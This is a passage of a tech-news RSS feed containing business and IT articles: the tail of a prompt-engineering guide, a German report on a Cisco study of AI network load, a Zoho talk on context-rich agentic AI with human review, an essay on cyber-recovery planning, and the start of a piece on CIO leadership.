<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Studie: Deutschlands Netze droht durch KI der Kollaps]]></title>
<description><![CDATA[Der Countdown läuft. In zwei Jahren könnten viele Netze unter der KI-Last zusammenbrechen.
Dabarti CGI/Shutterstock.com



Deutschland steht unter Zeitdruck. Diesen Eindruck vermittelt die Studie „The accelerating impact of AI on campus and branch networks“. Demnach haben hiesige Unternehmen nur ...]]></description>
<link>https://tsecurity.de/de/3688776/it-security-nachrichten/studie-deutschlands-netze-droht-durch-ki-der-kollaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688776/it-security-nachrichten/studie-deutschlands-netze-droht-durch-ki-der-kollaps/</guid>
<pubDate>Thu, 23 Jul 2026 13:02:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bombe.jpg?quality=50&amp;strip=all&amp;w=1024" alt="bomb" class="wp-image-4200557" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Der Countdown läuft. In zwei Jahren könnten viele Netze unter der KI-Last zusammenbrechen.</p>
</figcaption></figure><p class="imageCredit">Dabarti CGI/Shutterstock.com</p></div>



<p class="wp-block-paragraph">Deutschland steht unter Zeitdruck. Diesen Eindruck vermittelt die Studie „<a href="https://www.cisco.com/c/m/en_us/solutions/networking/ai-impact-campus-branch-networks.html">The accelerating impact of AI on campus and branch networks</a>“. Demnach haben hiesige Unternehmen nur noch etwa 24 Monate Zeit, bevor ihre Netzwerkkapazitäten mit der KI-Nutzung nicht mehr Schritt halten.</p>



<p class="wp-block-paragraph">Im Rahmen der Studie wurden 3.472 CIOs sowie Führungskräfte aus den Bereichen Netzwerk, End User Computing und Technologie in Asien-Pazifik, Europa, dem Nahen Osten, Lateinamerika und Nordamerika befragt. Darunter waren 200 aus Deutschland. Die Befragten arbeiten in Organisationen mit mehr als 500 Mitarbeitern. Die gemeinsam von Foundry und Cisco konzipierte sowie von Cisco gesponsorte Untersuchung wurde zwischen März und April 2026 durchgeführt.</p>



<h2 class="wp-block-heading">Kollaps in zwei Jahren</h2>



<p class="wp-block-paragraph">Die gewonnen Zahlen sind alarmierend: 67 Prozent der deutschen Betriebe erwarten, dass ihre Netze innerhalb der nächsten zwei Jahre an ihre Grenzen stoßen werden. Ganze 84 Prozent geben offen zu, dass sie massive Upgrades benötigen, um mit dem explodierenden Datenwachstum Schritt zu halten.</p>



<p class="wp-block-paragraph">Dabei ist KI längst kein Zukunftsszenario mehr. In deutschen Unternehmen ist sie im Arbeitsalltag angekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.computerwoche.de/article/3856418/genai-firmen-investieren-ohne-plan.html?utm=hybrid_search"><strong>GenAI</strong></a> (etwa Chatbots) wird bereits bei 36 Prozent unternehmensweit eingesetzt.</li>



<li><a href="https://www.computerwoche.de/article/4056375/agentic-ai-made-in-berlin-von-telekom-und-unicorn-n8n.html?utm=hybrid_search"><strong>Agentic A</strong></a><strong>I</strong> zur Automatisierung von Prozessen folgt mit 32 Prozent.</li>



<li><a href="https://www.computerwoche.de/article/4165504/die-ki-lernt-laufen-so-erobert-physical-ai-die-welt.html?utm=hybrid_search"><strong>Physical AI</strong></a>, etwa in der Robotik, liegt bei 25 Prozent.</li>
</ul>



<h2 class="wp-block-heading">Daten-Tsunami durch KI</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Netzauswirkung.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI" class="wp-image-4200559" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Auswirkungen der KI-Nutzung auf den Netzverkehr.</p>
</figcaption></figure><p class="imageCredit">Cisco White Paper “No time to wait: The accelerating impact of AI on campus and branch networks”</p></div>



<p class="wp-block-paragraph">Diese zunehmende KI-Nutzung bringt jedoch ein Problem mit sich: Der dadurch verursachte Datenverkehr wird sich, so die Studie, in den kommenden drei Jahren mehr als verdreifachen (ein Plus von 214 Prozent). Auf diesen Tsunami sind gerade einmal 16 Prozent der deutschen Unternehmen vollumfänglich vorbereitet.</p>



<p class="wp-block-paragraph">Aber warum bringen die neuen KI-Anwendungen die Infrastruktur so ins Schwitzen? Der Grund liegt in der Arbeitsweise der KI. Im Gegensatz zu einem menschlichen Nutzer, der gelegentlich eine Webseite aufruft, lösen KI-Agenten in Sekundenschnelle Dutzende von API-Aufrufen und Datenbankabfragen aus. Workloads, die keine Fehler verzeihen. Sie reagieren extrem empfindlich auf Latenz, Bandbreitenmangel und Paketverluste.</p>



<h2 class="wp-block-heading">Kritische Lage in der Industrie</h2>



<p class="wp-block-paragraph">Besonders entscheidend für die Wertschöpfung, Exportkraft und Produktivität in Deutschland ist die Industrie. Gemäß dem kürzlich von Cisco veröffentlichten <a href="https://url.usb.m.mimecastprotect.com/s/hPMoCqAE2Eflzv9zh7hYfERt4J?domain=u7061146.ct.sendgrid.net" target="_blank" rel="noreferrer noopener">State of Industrial AI Report</a> setzt zwar ein Fünftel der deutschen Unternehmen KI großflächig und ausgereift in laufenden Industrieprozessen ein. Viele Unternehmen stoßen jedoch durch fehlende Voraussetzungen insbesondere bei Netzwerkinfrastruktur, Cybersicherheit und IT/OT-Betriebsmodellen an ihre Grenzen. Dies gilt insbesondere, wenn KI in Echtzeit in der Produktion eingesetzt wird. Entsprechend benötigt vor allem die Industrie eine moderne und skalierbare Infrastruktur, denn mit KI wird die Netzwerkkapazität Teil der realen Wertschöpfung.</p>



<p class="wp-block-paragraph">Wenn KI für Deutschland wirklich eine zweite Chance ist, Versäumnisse der Digitalisierung aufzuholen, wie Uwe Peter, Geschäftsführer von Cisco Deutschland, postuliert, dann besteht Handlungsbedarf. So fordert Peter: „Deutschland muss jetzt dringend in KI-fähige und schnell skalierbare Netzwerke investieren, um weiterhin wettbewerbsfähig zu bleiben. Ansonsten droht unserem Wirtschaftsstandort gerade im Vergleich zu anderen Industrienationen ein erheblicher Rückstand.“</p>



<h2 class="wp-block-heading">Der weltweite Vergleich</h2>



<p class="wp-block-paragraph">Eine Gefahr, die die Studie zu belegen scheint. So sehen weltweit 23 Prozent (hierzulande 16 Prozent) der Unternehmen ihre Netzwerkinfrastruktur vollständig für die KI-Zukunft gerüstet. Und lediglich bei 76 Prozent (Deutschland 84 Prozent) der globalen Unternehmen sind Upgrades erforderlich. Bei der unternehmensweiten KI-Nutzung liegt der weltweite Durchschnitt aktuell in allen drei Bereichen vor Deutschland:</p>



<ul class="wp-block-list">
<li>Generative KI 51 Prozent,</li>



<li>Physical AI 28 Prozent</li>



<li>und Agentic AI 33 Prozent.</li>
</ul>



<p class="wp-block-paragraph">Ein Flaschenhals ist oft das Funknetz. Die Hälfte der Unternehmen nennt WLAN als den Bereich mit dem größten Kapazitätsbedarf. Hier entbrennt derzeit ein politischer Richtungsstreit um das 6-GHz-Band. Während Experten fordern, dieses Frequenzband für WLAN freizugeben, um die nötigen Kapazitäten für KI zu schaffen, empfiehlt ein EU-Beratungsgremium aktuell die Priorisierung des Mobilfunks.</p>



<p class="wp-block-paragraph">„Spektrumspolitik ist heute Industriepolitik“, kritisiert denn auch Peter. So stehe für Deutschland viel auf dem Spiel: Bis zum Jahr 2030 könnten der Industrie 13,7 Milliarden Euro verloren gehen, wenn das Spektrum nicht rechtzeitig für WLAN-Anwendungen zugänglich gemacht werde.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Datenübertragung vom iPhone: Wechsel zu Android wird erneut vereinfacht]]></title>
<description><![CDATA[Google arbeitet jetzt schon seit Jahren daran, dass der Wechsel auf ein Android-Telefon deutlich einfacher gemacht wird. Ziel sind iPhone-Kunden, die auf ein Android-Smartphone umziehen.…
Dieser Artikel Datenübertragung vom iPhone: Wechsel zu Android wird erneut vereinfacht erschien zuerst auf Sm...]]></description>
<link>https://tsecurity.de/de/3688692/android-tipps/datenuebertragung-vom-iphone-wechsel-zu-android-wird-erneut-vereinfacht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688692/android-tipps/datenuebertragung-vom-iphone-wechsel-zu-android-wird-erneut-vereinfacht/</guid>
<pubDate>Thu, 23 Jul 2026 12:22:36 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1356" height="838" src="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/06/Welcome-to-Android-Hero.jpg?fit=1356%2C838&amp;ssl=1" class="attachment-medium size-medium wp-post-image" alt="Welcome to Android Hero" decoding="async" fetchpriority="high"><p>Google arbeitet jetzt schon seit Jahren daran, dass der Wechsel auf ein Android-Telefon deutlich einfacher gemacht wird. Ziel sind iPhone-Kunden, die auf ein Android-Smartphone umziehen.…</p>
<p>Dieser Artikel <a rel="nofollow" href="https://www.smartdroid.de/datenuebertragung-vom-iphone-wechsel-zu-android-wird-erneut-vereinfacht/">Datenübertragung vom iPhone: Wechsel zu Android wird erneut vereinfacht</a> erschien zuerst auf <a rel="nofollow" href="https://www.smartdroid.de/">SmartDroid.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Smaller, smarter, safer: How to build agentic AI on the right foundation]]></title>
<description><![CDATA[When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.



“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a sui...]]></description>
<link>https://tsecurity.de/de/3688632/it-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688632/it-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</guid>
<pubDate>Thu, 23 Jul 2026 12:04:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.</p>



<p class="wp-block-paragraph">“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a suite of popular cloud-based software solutions for sales, marketing, and finance.</p>



<p class="wp-block-paragraph">“I’m on the business side, and so decisions made by our CIO and IT folks affect me directly, and my teams’ workflows and processes,” he added.</p>



<p class="wp-block-paragraph">Speaking to a room of tech leaders at the <a href="https://event.foundryco.com/cio-100-leadership-live-new-york/">CIO 100 Leadership Live New York event</a> last week, Thakrar explained that every company wants the speed of AI-generated work wedded to the quality of human work, even though these two are diametrically opposed. No amount of model upgrades or spend will close that gap, so the only way forward is to architect your way out. Thakrar encapsulated this idea in a simple formula:</p>



<ul class="wp-block-list">
<li>Smaller: Stop deploying maximum firepower on every task. Many tasks don’t need it.</li>



<li>Smarter: The system around the model decides more than the model does.</li>



<li>Safer: Verify at the point a mistake gets locked in, not just downstream of it.</li>
</ul>



<p class="wp-block-paragraph">He noted that organizations that win with AI won’t be those deploying the biggest, most powerful models or the most sophisticated architecture, but the ones that figure out that the model is the easy part and the right architecture is harder. That means understanding the hardest element, and the biggest differentiator, is building a human system that learns and compounds alongside agentic systems.</p>



<p class="wp-block-paragraph">To get it right, organizations need to prioritize the context layer. The size of frontier models like the GPT series, Claude, and Gemini mostly exist to compensate for missing context, Thakrar explained. Without enough context, models need to be able to reason harder and infer more about what a user actually means because it doesn’t know the user’s account, process, or history. A rich context layer makes it possible for enterprises to run workloads on much smaller, lower-power models.</p>



<p class="wp-block-paragraph">“The intelligence moves from the model into the architecture around it,” he said.</p>



<h2 class="wp-block-heading">A steep learning curve</h2>



<p class="wp-block-paragraph">One of Zoho’s earliest AI agents was a churn management agent to help the account management team detect churn in customer subscriptions. So when a subscription became inactive, the agent would collect context from notes, meeting recordings, and Zoho’s data enrichment tool, then create a summary of reasons the account might have churned, and schedule a call.</p>



<p class="wp-block-paragraph">“What happened was I got this churn agent a couple months later, already embedded in our CRM, and within a week my team no longer trusted that agent,” Thakrar said. “The reason is we forgot to collect one very key point.”</p>



<p class="wp-block-paragraph">In Zoho’s CRM, when a customer buys a bundle of products, that bundle is represented as a single line item. That means the status of any products the customer may have previously purchased individually changes to inactive as they’re moved to the bundle. That’s not churn, but it was interpreted it that way. Zoho fixed it in the second version of the agent.</p>



<p class="wp-block-paragraph">Then a new problem arose. Many potential customers first purchase Zoho products as pilots or sandboxes. As those customers move from pilot to live instance, they close down the pilot versions. And again, the CRM would record that as subscriptions going inactive.</p>



<p class="wp-block-paragraph">“The trust deteriorates again because everyone got excited for version 2,” Thakrar said.</p>



<p class="wp-block-paragraph">Sometimes, a certain product might not be the best fit for a customer and Thakrar’s team will suggest the customer move to another product. That’s deliberate churn, not a churn risk.</p>



<p class="wp-block-paragraph">“You may have a similar story like this where the agent sounds so good, it’s going to do something quick and add value, but it’s missing context from the account managers, and there are so many more pieces we’re still building out,” Thakrar said. “It’s been almost a year and the problem I have is my team still doesn’t trust it. They’ll see [a message from the agent] and go out and do all the research anyway to make sure it gave the correct answer.”</p>



<p class="wp-block-paragraph">The team is more on top of potential churn, though, but the promised productivity gains have yet to materialize because the agent has to earn back lost trust due to a lack of context.</p>



<p class="wp-block-paragraph">“My goal for this year is having an AI-assisted customer journey from sales to account management where the handoff is clean, the context flows, and every piece of information we gather about a customer is weighed, identified, and coached so the sales team can close more deals,” he said.</p>



<p class="wp-block-paragraph">Zoho’s early experience with agents has led to the idea that constrained, context-rich, deterministic architectures consistently outperform expensive models bolted onto fragmented systems. It all comes down to three pillars: routing, harness, and specialization.</p>



<h3 class="wp-block-heading">Routing</h3>



<p class="wp-block-paragraph">Routing is about sending workloads to the proper model for the job, which entails providing enough context to a given task that a small, cheap model can handle it without the need for spare reasoning capacity to fill gaps.</p>



<p class="wp-block-paragraph">Frontier models are expensive and companies can burn through a year’s budget worth of tokens in months. But most tasks can be handled by much smaller, more constrained models at a fraction of the cost.</p>



<p class="wp-block-paragraph">“You don’t always have to pay the frontier guys for every task,” he said. “We’ve observed with some clients that we could save them 95% with a 3 billion parameter model.”</p>



<h3 class="wp-block-heading">Harness</h3>



<p class="wp-block-paragraph">An AI agent harness is the software infrastructure scaffolding around an LLM that differentiates an agent from a chatbot. It’s what enables an agent to act on tasks rather than simply respond to prompts. A model reasons through a problem and decides what to do about it. The harness connects the model to the tools, systems, memory, guardrails, and execution environments required to perform the actions determined by the model. The term is frequently used more or less interchangeably with orchestration layer.</p>



<p class="wp-block-paragraph">“It’s the process around the model, which matters way more than the model itself,” Thakrar said.</p>



<p class="wp-block-paragraph">In benchmark tests, a superior harness on a less powerful model produces better results than an inferior harness on a much bigger model.</p>



<p class="wp-block-paragraph">For the best results, Thakrar said, it’s essential to understand the deterministic and non-deterministic elements of a given workload, and build that into the architecture. Machines can read, organize, and validate, and they excel at deterministic tasks. Humans, on the other hand, are exceptional at non-deterministic tasks like judging, synthesizing, and deciding.</p>



<p class="wp-block-paragraph">Those non-deterministic tasks in a process are the ideal point for AI agents to incorporate a human in the loop, what Thakrar calls human harness. He pointed to a stakeholder mapping agent Zoho built for sales as an example, which takes the context of an initial meeting and third-party enriched data like a LinkedIn profile, weighs probabilities, and makes an educated guess about the stakeholder map.</p>



<p class="wp-block-paragraph">“The initial goal was just to eliminate that task completely from the human workflow,” he said. “The stakeholder map is done, it’s in the folder, and you can look at it.”</p>



<p class="wp-block-paragraph">But the agent would struggle to capture nuance. The meanings of titles in organizations always vary, and the politics and dynamics of any given meeting can be difficult for an AI agent to discern. Rather than keep feeding the agent data to try to make it intelligent enough to make those determinations, it was simpler and more efficient for the agent to create a proposed stakeholder map and hand it over to a human who could make changes and explain why those changes were necessary.</p>



<p class="wp-block-paragraph">Ultimately, Thakrar said the agent still saved human team members time because the stakeholder map was usually pretty close, and the corrections also helped the model grow smarter by adding richer context.</p>



<h3 class="wp-block-heading">Specialization</h3>



<p class="wp-block-paragraph">Specialization is transitioning a process from testing on a frontier model to production on a much narrower, smaller model. Once you’ve proven that an agent can do a job well, you want to stop paying master-craftsman rates to keep doing that one job well.</p>



<p class="wp-block-paragraph">Specialization is all about capturing your subject matter experts’ best judgement and pattern recognition to build an open-weight, open source, trained, and fine-tuned model that can be deployed in your own data center.</p>



<p class="wp-block-paragraph">“The true enterprise bet is to keep that orchestration layer, which is your IP and knowledge, in house,” Thakrar said. “You don’t want to host that on someone else’s model. The goal of everyone in enterprise should be to run, train, and host their own models.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Principles every enterprise must test before the attack arrives]]></title>
<description><![CDATA[I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.



Imagine this: A major global enterprise, a company mos...]]></description>
<link>https://tsecurity.de/de/3688625/it-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688625/it-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</guid>
<pubDate>Thu, 23 Jul 2026 12:04:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.</p>



<p class="wp-block-paragraph">Imagine this: A major global enterprise, a company most of us interact with indirectly every single day, wakes up to find its entire digital environment obliterated. Thousands of employees in dozens of offices and remote locations are suddenly offline. Customers are cut off, supply chains grind to a halt and regulators are notified with a chilling admission: “We have no idea when we’ll be back.”</p>



<p class="wp-block-paragraph">This wasn’t ransomware. There was no negotiation, no decryption key to buy, no easy way out. It was destruction — deliberate, coordinated and geopolitically motivated — not monetary.</p>



<p class="wp-block-paragraph">As a chief customer officer who’s worked with countless customers on cyberattack risks, my perspective hits a bit differently than a CISO or a CTO. I see the aftermath, not just the attack surface. I see the faces behind the tickets, the operations team locked out of their own systems, the support agent answering panicked calls at dawn. And I ask: How many organizations have actually stress-tested their response to this scenario — not a hypothetical, but this very real, lights-out event? Here’s what every leader needs to confront today:</p>



<h2 class="wp-block-heading">Recovery is not just a technical exercise</h2>



<p class="wp-block-paragraph">The first assumption to break during a real crisis is <a href="https://www.cio.com/article/4165019/your-cloud-strategy-is-incomplete-without-a-cyber-recovery-plan.html">the belief that recovery is purely technical</a>.</p>



<p class="wp-block-paragraph">Many organizations have done tabletop exercises and have a backup and recovery playbook, so they feel prepared. They can <a>point to</a> backup windows, retention schedules and immutability controls. The moment a true blackout happens, a different reality surfaces. The people who own the recovery steps either do not know each other, lack the authority to make decisions without supervisor approval or need guidance from offline systems.</p>



<p class="wp-block-paragraph">The reality is that technical infrastructure almost always holds up better than human infrastructure. Organizations have built their recovery strategy around the assumption that someone competent will be awake, available and empowered when a cyber event happens.</p>



<p class="wp-block-paragraph">Still, backups are only as good as their independence. Let’s be blunt: If your recovery infrastructure shares identity, authentication or network trust with your Microsoft tenant (such as Azure, Microsoft 365 or Teams), you don’t actually have a recovery plan; you have a false sense of one — and a liability. A <a href="https://www.veeam.com/company/press-release/veeam-report-reveals-a-market-wide-shift-from-recovery-confidence-to-proven-data-resilience-amid-ransomware-threats-and-ai-adoption.html">recent survey</a> found that while 90% of organizations express confidence in their ability to recover from a cyber incident, fewer than one in three ransomware victims fully recovered their data.</p>



<p class="wp-block-paragraph">True resilience means immutable, air-gapped backups, untouchable by the same compromise. Anything less is an illusion. I talk to customers about their recovery plans constantly. The customers who have rehearsed all scenarios sleep soundly. Those who haven’t? They’re rolling the dice.</p>



<h2 class="wp-block-heading">Most business continuity plans ignore ‘total blackout’</h2>



<p class="wp-block-paragraph">I’ve reviewed hundreds of business continuity plans. Almost all assume partial failures — a region, an application, a data center. But what if every system, in every country, goes dark simultaneously? That’s an entirely different playbook. If your team hasn’t run a drill for a global, simultaneous outage, you’re not prepared. The probability is low, but the cost of being unready is existential.</p>



<p class="wp-block-paragraph">Connected devices, OT systems, field hardware, partner integrations — they all plug into your enterprise network. When the core collapses, it’s not just IT at risk. It’s operational technology, physical safety systems and in regulated sectors, potentially human lives. Understanding and testing those interdependencies is non-negotiable.</p>



<p class="wp-block-paragraph">This is also where boards need to change the conversation. A <a href="https://www.diligent.com/resources/research/cybersecurity-audit">study found</a> that only 5% of companies have cybersecurity experts on their board of directors. Recovery time objectives (RTOs) should not be buried in technical appendices. It’s all jargon to boards. That makes translation essential. RTOs must be explained in terms of business impact. “We can recover in four hours” is a technical statement. “Every hour of downtime costs us $2.3M and creates regulatory exposure in three jurisdictions” is a board statement.</p>



<p class="wp-block-paragraph">That is the level of clarity leaders need.</p>



<p class="wp-block-paragraph">The most prepared organizations do not wait for an incident to educate the board. They bring the conversation forward proactively. They frame recovery in business terms: revenue, regulatory standing, customer trust and brand reputation.</p>



<p class="wp-block-paragraph">The most effective framing is often simple. Show the most critical systems. Show what happens if each one is down for one hour, four hours, 24 hours and 72 hours. Show the current recovery capability against each and then show the gap.</p>



<p class="wp-block-paragraph">If your board is not demanding real answers, your business continuity strategy is likely underfunded and your business is exposed. This is a risk conversation worth forcing because the consequences do not stay inside IT. They can show up in customer churn or missed revenue and ruin an organization’s reputation.</p>



<h2 class="wp-block-heading">Threat intelligence must be actionable, not archived</h2>



<p class="wp-block-paragraph">Geopolitical attacks, hacktivist campaigns and nation-state targeting aren’t abstract threats. They are active risks, and that intelligence cannot languish in the security team’s inbox. Executive leadership must be looped in — and immediately — so gaps can be closed before they’re exploited. Too often, intelligence enters the security operations function and never reaches the teams responsible for recovery infrastructure or executive decision-making.</p>



<p class="wp-block-paragraph">If a threat actor is targeting a specific class of backup agents, the team responsible for those agents needs to know now, not two weeks from now. If intelligence suggests destructive activity against a sector, recovery owners need to validate isolation, access paths and restoration procedures immediately. If geopolitical tension increases the likelihood of targeting, executive leadership needs to understand what exposure exists and what actions are being taken. The organizations that survive aren’t just the best at incident response. They’re the ones who anticipated, rehearsed and invested <em>before</em> the attack.</p>



<p class="wp-block-paragraph">Part of investing in a recovery strategy requires closing the loop between signal and action. The most prepared organizations have already mapped their critical recovery dependencies to specific threat categories. When intelligence touches one of those categories, there is a named owner and a clear set of actions. No guessing or forwarding emails into the void is needed because the distance between the warning and the employees’ ability to do something is shortened.</p>



<p class="wp-block-paragraph">Looking ahead, the conversation will continue to evolve beyond traditional cyber response. Because in an AI-enabled enterprise, the new question is whether the data within those systems can still be trusted. When AI systems make decisions based on enterprise data, the attack surface becomes the data’s accuracy. A threat actor who quietly corrupts a dataset over 90 days before a recovery event has done more damage than just downtime. They can poison the inputs driving decisions across the business.</p>



<p class="wp-block-paragraph">Regardless of how AI will change threat intelligence and cyber response, these principles remain the same. Know your problem, whether structural or technological. Ensure your human infrastructure keeps pace with your technical infrastructure, with clear cross-functional ownership and the tools and knowledge to act autonomously. Communicate with your boards often — and correctly.</p>



<p class="wp-block-paragraph">Let’s not wait for the next headline to ask, “Are we ready?” Have those conversations <em>now</em>. Test your assumptions. Close your gaps. Because in today’s threat landscape, resilience isn’t IT’s job — it’s everyone’s mandate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI success requires a full-stack CIO]]></title>
<description><![CDATA[Every CIO I speak with today is wrestling with some version of the same question: How do we move faster with AI and deliver on our commitments?



It’s an understandable concern. Boards and CEOs are asking about AI. Business leaders are experimenting with use cases. Employees are discovering tool...]]></description>
<link>https://tsecurity.de/de/3688546/it-nachrichten/ai-success-requires-a-full-stack-cio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688546/it-nachrichten/ai-success-requires-a-full-stack-cio/</guid>
<pubDate>Thu, 23 Jul 2026 11:43:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every CIO I speak with today is wrestling with some version of the same question: How do we move faster with AI and deliver on our commitments?</p>



<p class="wp-block-paragraph">It’s an understandable concern. <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">Boards and CEOs are asking about AI</a>. Business leaders are experimenting with use cases. Employees are discovering tools daily, while technology vendors promise unprecedented gains in productivity, innovation, and competitive advantage.</p>



<p class="wp-block-paragraph">After hundreds of conversations with technology executives over the past year, I’ve become convinced that speed isn’t the real issue. The organizations pulling away from the pack aren’t necessarily adopting AI faster than everyone else. They’re executing more effectively — a subtle distinction that represents one of the defining leadership challenges of the AI era.</p>



<p class="wp-block-paragraph">Technology has never been the hardest part of transformation. People, priorities, culture, and operating models are the biggest challenges. The ability to translate bold boardroom aspirations into thousands of thoughtful decisions made every day by architects, engineers, product managers, analysts, and business leaders is where competitive advantage is created. AI may be accelerating the pace of change, but it hasn’t changed that fundamental truth.</p>



<p class="wp-block-paragraph">I’ve met plenty of executives who are exceptional in the boardroom. They know how to frame a vision, <a href="https://www.cio.com/article/272180/relationship-building-networking-how-to-wow-your-board-of-directors.html">influence a board</a>, and build confidence among investors and business leaders. I’ve also met remarkable technologists who instinctively understand the architectural decisions, engineering tradeoffs, and implementation details that determine how great ideas become reality. Modern CIOs, however, must move comfortably between both worlds. Afshean Talasaz is one who stands out among this rare breed.</p>



<p class="wp-block-paragraph">Long before becoming CIO of Colonial Pipeline, Talasaz built his career from the ground up as a business professional, data scientist, and technologist. He has designed enterprise platforms, built AI capabilities, led technology organizations, and partnered closely with executive leadership teams on business transformation. Today, as an executive in residence with our Practitioners for Practitioners (P4P) community, he helps CIOs and business leaders navigate one of the most significant technology shifts of our generation.</p>



<p class="wp-block-paragraph">While Talasaz brings deep knowledge of data and AI to the table, his greatest strength is his ability to create strategy and connect it with execution. He can spend the morning discussing enterprise reinvention with the board and the afternoon debating architectural principles with the teams responsible for bringing that vision to life.</p>



<p class="wp-block-paragraph">That versatility gives Talasaz a unique lens on how CIOs <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">can deliver value with AI</a>.</p>



<p class="wp-block-paragraph">Software companies have a term for engineers who understand every layer of the technology stack: full-stack developers. Listen to Talasaz and it becomes evident that the AI era requires something similar from technology leaders: a full-stack CIO.</p>



<h2 class="wp-block-heading">The full-stack CIO: Leading with clarity</h2>



